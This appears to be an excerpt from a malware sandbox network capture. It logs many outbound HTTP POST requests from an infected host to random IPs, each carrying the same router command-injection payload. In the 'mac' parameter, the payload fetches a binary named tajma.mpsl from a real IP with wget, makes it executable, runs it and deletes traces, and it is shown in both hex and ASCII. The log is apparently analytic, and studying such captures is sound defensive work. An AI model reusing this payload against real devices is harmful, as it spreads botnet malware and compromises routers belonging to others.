                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2417192.168.2.2334568130.78.150.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483603954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2418192.168.2.2340494101.148.164.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483618021 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2419192.168.2.23423104.34.136.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483630896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2420192.168.2.2354332195.21.30.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483659983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2421192.168.2.2341652160.112.34.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483679056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2422192.168.2.235872824.3.122.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483690023 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2423192.168.2.2352418194.70.139.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483896017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2424192.168.2.2346030189.232.231.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483928919 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2425192.168.2.2339486160.10.143.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483947039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2426192.168.2.2342030176.76.77.1648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483978987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2427192.168.2.233503450.127.200.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484030962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2428192.168.2.2337314113.86.92.638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484030962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2429192.168.2.235616075.64.171.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484055042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2430192.168.2.235343646.154.9.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484096050 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2431192.168.2.2349018114.130.242.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484108925 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2432192.168.2.2352382132.91.218.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484133959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2433192.168.2.2350950126.96.128.718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484147072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2434192.168.2.2335334160.74.86.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484164000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2435192.168.2.2341954169.27.161.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484179974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2436192.168.2.23349365.162.236.1838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484200001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2437192.168.2.2337414130.40.172.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484213114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2438192.168.2.2352312136.155.153.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484225035 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2439192.168.2.2340386208.91.197.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484250069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
